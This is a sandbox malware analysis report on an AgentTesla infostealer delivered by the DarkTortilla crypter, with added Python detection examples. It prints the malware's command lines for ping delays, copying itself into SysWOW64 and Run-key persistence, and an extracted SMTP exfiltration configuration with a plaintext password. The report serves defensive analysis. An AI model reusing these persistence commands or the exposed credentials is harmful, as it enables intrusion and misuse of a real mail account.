Windows Analysis Report
PO CONTRACT.exe

Overview

General Information

Sample name: PO CONTRACT.exe
Analysis ID: 1493192
MD5: e9e7439b7d1098424bfc0bc877b7b2c2
SHA1: 5e0660202b12db946ae396fd8252111d5eaaea73
SHA256: 7787902137178990efe8cb5974196101405cab9c70332fbbd45f546fd4fcb04c

Detection

AgentTesla, DarkTortilla
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains very large array initializations
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • PO CONTRACT.exe (PID: 4388 cmdline: "C:\Users\user\Desktop\PO CONTRACT.exe" MD5: E9E7439B7D1098424BFC0BC877B7B2C2)
    • cmd.exe (PID: 1348 cmdline: "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • PING.EXE (PID: 2836 cmdline: ping 127.0.0.1 -n 36 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • reg.exe (PID: 5436 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 1496 cmdline: "cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • PING.EXE (PID: 1276 cmdline: ping 127.0.0.1 -n 43 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • PING.EXE (PID: 7768 cmdline: ping 127.0.0.1 -n 43 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • SOA.exe (PID: 7300 cmdline: "C:\Windows\SysWOW64\SOA.exe" MD5: E9E7439B7D1098424BFC0BC877B7B2C2)
        • InstallUtil.exe (PID: 6732 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • GUIVTme.exe (PID: 2092 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • GUIVTme.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • conhost.exe (PID: 3572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
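The two cmd.exe chains in the tree above are the persistence sequence that the "Uses ping.exe to sleep", "Potential Persistence Attempt Via Run Keys Using Reg.EXE" and "Suspicious Copy From or To System Directory" signatures flag: a loopback ping as a delay, a copy of the sample into C:\Windows\SysWOW64, a Run-key value written with reg.exe, and execution of the copy. The Python below is an added example (editor's code, not part of the Joe Sandbox report) that applies that detection logic to process-creation records copied from the tree; the record layout, the tag names and the delay estimate (ping -n N against loopback takes roughly N-1 seconds, since ping waits about one second between requests) are the example's own assumptions.

```python
"""Flag staged persistence chains like the cmd.exe lines in the process tree above."""
import re
from dataclasses import dataclass, field

# Process-creation records copied from the sandbox process tree above; the
# conhost.exe entry is a benign control that must not be flagged.
SAMPLE_PROCESSES = [
    {"pid": 1348, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"'},
    {"pid": 1496, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe"'},
    {"pid": 2540, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# "cmd" /c <body>  or  C:\...\cmd.exe /k <body>; everything after /c or /k is the body.
CMD_BODY_RE = re.compile(
    r'^\s*"?(?:[a-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+(?:/\S+\s+)*?/[ck]\s+(?P<body>.+)$', re.IGNORECASE)
REDIRECT_RE = re.compile(r"\s*\d?>>?\s*\S+")                    # "> nul", "2>nul", ">> x.log"
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?$", re.IGNORECASE)
SYSTEM_DIR_RE = re.compile(r"^[a-z]:\\Windows\\", re.IGNORECASE)
LOOPBACK = {"127.0.0.1", "localhost", "::1"}


@dataclass
class Finding:
    pid: int
    tags: list = field(default_factory=list)
    details: dict = field(default_factory=dict)
    sleep_seconds: int = 0          # estimated delay from loopback pings


def split_chain(body):
    """Split a cmd.exe body on & and && that sit outside double quotes."""
    segments, current, in_quotes, i = [], [], False, 0
    while i < len(body):
        ch = body[i]
        if ch == '"':
            in_quotes = not in_quotes
        if not in_quotes and ch == "&":
            segments.append("".join(current))
            current = []
            i += 2 if body.startswith("&&", i) else 1
            continue
        current.append(ch)
        i += 1
    segments.append("".join(current))
    return [s.strip() for s in segments if s.strip()]


def tokens(segment):
    """Whitespace-split a segment, keeping quoted paths with spaces intact."""
    segment = REDIRECT_RE.sub("", segment)
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', segment)]


def analyze(record):
    """Return a Finding for a cmd.exe record that shows any of the four behaviours, else None."""
    m = CMD_BODY_RE.match(record["cmdline"])
    if not m:
        return None
    f = Finding(pid=record["pid"])
    for seg in split_chain(m.group("body")):
        toks = tokens(seg)
        if not toks:
            continue
        verb = toks[0].lower()
        if verb in ("ping", "ping.exe"):
            n_idx = toks.index("-n") if "-n" in toks else -1
            target = next((t for t in toks[1:] if not t.startswith("-") and not t.isdigit()), "")
            if 0 < n_idx < len(toks) - 1 and toks[n_idx + 1].isdigit() and target.lower() in LOOPBACK:
                f.tags.append("ping_sleep")
                f.sleep_seconds += max(int(toks[n_idx + 1]) - 1, 0)
        elif verb in ("reg", "reg.exe") and len(toks) > 2 and toks[1].lower() == "add" and RUN_KEY_RE.search(toks[2]):
            f.tags.append("run_key_persistence")
            f.details["run_key"] = toks[2]
            for i, t in enumerate(toks[3:-1], start=3):   # /v <name>, /d <data>
                if t.lower() == "/v":
                    f.details["run_key_value"] = toks[i + 1]
                elif t.lower() == "/d":
                    f.details["run_key_data"] = toks[i + 1]
        elif verb in ("copy", "xcopy", "move") and len(toks) >= 3 and SYSTEM_DIR_RE.match(toks[2]):
            f.tags.append("copy_to_system_dir")
            f.details["copy_dst"] = toks[2]
        elif len(toks) == 1 and SYSTEM_DIR_RE.match(toks[0]) and toks[0].lower().endswith(".exe"):
            f.tags.append("exec_from_system_dir")
            f.details["exec"] = toks[0]
    # A delay followed by a Run-key write or a copy into the system directory is the staged pattern.
    if "ping_sleep" in f.tags and {"run_key_persistence", "copy_to_system_dir"} & set(f.tags):
        f.tags.append("staged_persistence")
    return f if f.tags else None


def scan(records):
    """Map pid -> Finding for every record that produced one."""
    return {r["pid"]: fnd for r in records if (fnd := analyze(r))}


if __name__ == "__main__":
    for pid, fnd in scan(SAMPLE_PROCESSES).items():
        print(pid, fnd.tags, "%ds delay" % fnd.sleep_seconds, fnd.details)
```

Ping-based sleeps also appear in legitimate installer scripts, so the "staged_persistence" tag is the one worth alerting on: it requires the delay and the Run-key write (or the copy into C:\Windows) to come from the same cmd.exe invocation, which is exactly what the Sigma rule hits above show for PIDs 1348 and 1496.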
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: No attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
Malware Configuration

AgentTesla: {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.unitechautomations.com", "Username": "design@unitechautomations.com", "Password": "Unitech@123"}
Yara matches in memory dumps (Source | Rule | Description | Author):

0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
(27 further entries not shown)
Yara matches in unpacked PEs (Source | Rule | Description | Author | Strings):

0.2.PO CONTRACT.exe.4044ef2.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.PO CONTRACT.exe.4044ef2.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.PO CONTRACT.exe.4044ef2.2.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
0.2.PO CONTRACT.exe.4044ef2.2.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x31d64:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x31dd6:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x31e60:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31ef2:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31f5c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31fce:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x32064:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x320f4:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.SOA.exe.401c15a.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(63 further entries not shown)
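The INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID hit above matches eight Windows Vault schema GUIDs inside the unpacked payload. The Python below is an added example (editor's code, not the published rule and not part of the Joe Sandbox report) of the one property such a rule depends on: .NET compiles string literals into the #US heap as UTF-16LE, so a search that only looks for ASCII text misses them, which is what YARA's `wide` modifier exists for. The sample buffer is constructed here, and the rule condition used (MZ header plus at least five distinct GUIDs) is this example's assumption rather than the published rule's exact condition.

```python
"""Encoding-aware search for the Windows Vault schema GUIDs matched above."""
import re

# The eight GUIDs listed as $s1..$s8 in the rule hit above.
VAULT_SCHEMA_GUIDS = [
    "2F1A6504-0641-44CF-8BB5-3612D865F2E5",
    "3CCD5499-87A8-4B10-A215-608888DD3B55",
    "154E23D0-C644-4E6F-8CE6-5069272F999F",
    "4BF4C442-9B8A-41A0-B380-DD4A704DDB28",
    "77BC582B-F0A6-4E15-4E80-61736B6F3B29",
    "E69D7838-91B5-4FC9-89D5-230D4D4CC2BC",
    "3E0E35BE-1B77-43E7-B873-AED901B6275B",
    "3C886FF3-2669-4AA2-A8FB-3F6759A77548",
]

# YARA string modifier -> Python codec. "wide" is YARA's name for UTF-16LE.
CODECS = {"ascii": "ascii", "wide": "utf-16-le"}


def find_guids(data, modifiers=("ascii", "wide")):
    """Map each GUID to the (offset, modifier) pairs at which it occurs in data.

    Matching is case-insensitive: the rule lists the GUIDs in upper case,
    while .NET code frequently carries them in lower case."""
    hits = {}
    for guid in VAULT_SCHEMA_GUIDS:
        for mod in modifiers:
            pattern = re.escape(guid.encode(CODECS[mod]))
            for m in re.finditer(pattern, data, re.IGNORECASE):
                hits.setdefault(guid, []).append((m.start(), mod))
    return hits


def report(data, modifiers=("ascii", "wide")):
    """Lines in the report's style ('0x31d64:$s1 (wide)'), sorted by offset."""
    lines = []
    for guid, places in find_guids(data, modifiers).items():
        sid = "$s%d" % (VAULT_SCHEMA_GUIDS.index(guid) + 1)
        lines += [(off, "0x%x:%s (%s)" % (off, sid, mod)) for off, mod in places]
    return [text for _, text in sorted(lines)]


def matches_rule(data, minimum=5, modifiers=("ascii", "wide")):
    """Assumed condition: MZ header and at least `minimum` distinct GUIDs
    (the published rule's exact condition is not reproduced here)."""
    return data[:2] == b"MZ" and len(find_guids(data, modifiers)) >= minimum


def build_sample():
    """Constructed stand-in for a .NET image, not a real binary: an MZ stub,
    filler, six GUIDs stored the way the #US heap stores literals (UTF-16LE,
    here lower-cased), one GUID as ASCII, and one GUID absent."""
    blob = bytearray(b"MZ" + b"\x90" * 62)
    blob += b"this is filler, not real code\x00" * 4
    for guid in VAULT_SCHEMA_GUIDS[:6]:
        blob += b"\x00" * 3 + guid.lower().encode("utf-16-le")
    blob += b"\x00" * 5 + VAULT_SCHEMA_GUIDS[6].encode("ascii")
    return bytes(blob)


if __name__ == "__main__":
    sample = build_sample()
    print("\n".join(report(sample)))
    print("ascii+wide:", matches_rule(sample),
          " ascii only:", matches_rule(sample, modifiers=("ascii",)))
```

Run against the constructed sample, the ASCII-only search sees a single GUID and the rule does not fire; the ASCII plus wide search sees seven and it does. The offsets in the hit above are spaced roughly 0x70 to 0x90 bytes apart, which is consistent with 36-character strings stored two bytes per character plus heap overhead, so the matches in the real payload are wide strings as well.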

Sigma Overview

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\SysWOW64\SOA.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SOA
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1348, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe", ProcessId: 5436, ProcessName: reg.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe", CommandLine: "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\PO CONTRACT.exe", ParentImage: C:\Users\user\Desktop\PO CONTRACT.exe, ParentProcessId: 4388, ParentProcessName: PO CONTRACT.exe, ProcessCommandLine: "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe", ProcessId: 1348, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe", CommandLine: "cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\PO CONTRACT.exe", ParentImage: C:\Users\user\Desktop\PO CONTRACT.exe, ParentProcessId: 4388, ParentProcessName: PO CONTRACT.exe, ProcessCommandLine: "cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe", ProcessId: 1496, ProcessName: cmd.exe

Suricata Overview

No Suricata rule has matched


                    AV Detection

Source: 10.2.SOA.exe.3fa5dca.0.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.unitechautomations.com", "Username": "design@unitechautomations.com", "Password": "Unitech@123"}
Source: C:\Windows\SysWOW64\SOA.exe | ReversingLabs: Detection: 47%
Source: C:\Windows\SysWOW64\SOA.exe | Virustotal: Detection: 57%
Source: PO CONTRACT.exe | Virustotal: Detection: 34%
Source: PO CONTRACT.exe | ReversingLabs: Detection: 47%
Source: C:\Windows\SysWOW64\SOA.exe | Joe Sandbox ML: detected
Source: PO CONTRACT.exe | Joe Sandbox ML: detected
Source: PO CONTRACT.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PO CONTRACT.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll | source: GUIVTme.exe, 0000000D.00000000.37571661992.0000000000452000.00000002.00000001.01000000.0000000A.sdmp, GUIVTme.exe.11.dr
Source: Binary string: indows\Microsoft.VisualBasic.pdbpdbsic.pdb | source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lBasic.pdb | source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb | source: GUIVTme.exe, 0000000D.00000000.37571661992.0000000000452000.00000002.00000001.01000000.0000000A.sdmp, GUIVTme.exe.11.dr
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb## | source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: til.pdb | source: InstallUtil.exe, 0000000B.00000002.40726882971.0000000006479000.00000004.00000020.00020000.00000000.sdmp

                    Networking

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 36
Source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.mic
Source: PO CONTRACT.exe, 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, PO CONTRACT.exe, 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, PO CONTRACT.exe, 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, SOA.exe, 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, SOA.exe, 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, cPKWk.cs | .Net Code: MPvOvSMQSR
Source: 0.2.PO CONTRACT.exe.4009d32.0.raw.unpack, cPKWk.cs | .Net Code: MPvOvSMQSR
Source: 0.2.PO CONTRACT.exe.4044ef2.2.raw.unpack, cPKWk.cs | .Net Code: MPvOvSMQSR
Source: 0.2.PO CONTRACT.exe.5747378.4.raw.unpack, cPKWk.cs | .Net Code: MPvOvSMQSR
Source: 10.2.SOA.exe.3fa5dca.0.raw.unpack, cPKWk.cs | .Net Code: MPvOvSMQSR

                    System Summary

Source: 0.2.PO CONTRACT.exe.4044ef2.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.SOA.exe.401c15a.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.SOA.exe.3fe0f9a.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO CONTRACT.exe.5747378.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO CONTRACT.exe.3fceb62.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.SOA.exe.3fa5dca.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO CONTRACT.exe.4009d32.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.SOA.exe.3fe0f9a.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.SOA.exe.401c15a.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.SOA.exe.570c1d8.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO CONTRACT.exe.4044ef2.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.SOA.exe.570c1d8.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO CONTRACT.exe.4009d32.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.SOA.exe.3fa5dca.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO CONTRACT.exe.5747378.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: PO CONTRACT.exe, Lg3n7.cs | Large array initialization: Lg3n7: array initializer size 2053
Source: SOA.exe.5.dr, Lg3n7.cs | Large array initialization: Lg3n7: array initializer size 2053
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A759CB0 CreateProcessAsUserW
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\SOA.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\SOA.exe:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_02D64420
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_02D6C8D8
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_02D637E0
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_02D61300
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_05453EA0
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08F50AB8
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08F50040
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08FF4066
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08FF94C0
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08FF2A8D
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08FF2B00
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_097209D8
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_09728058
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_0972BD58
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_0972BD47
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08F50A94
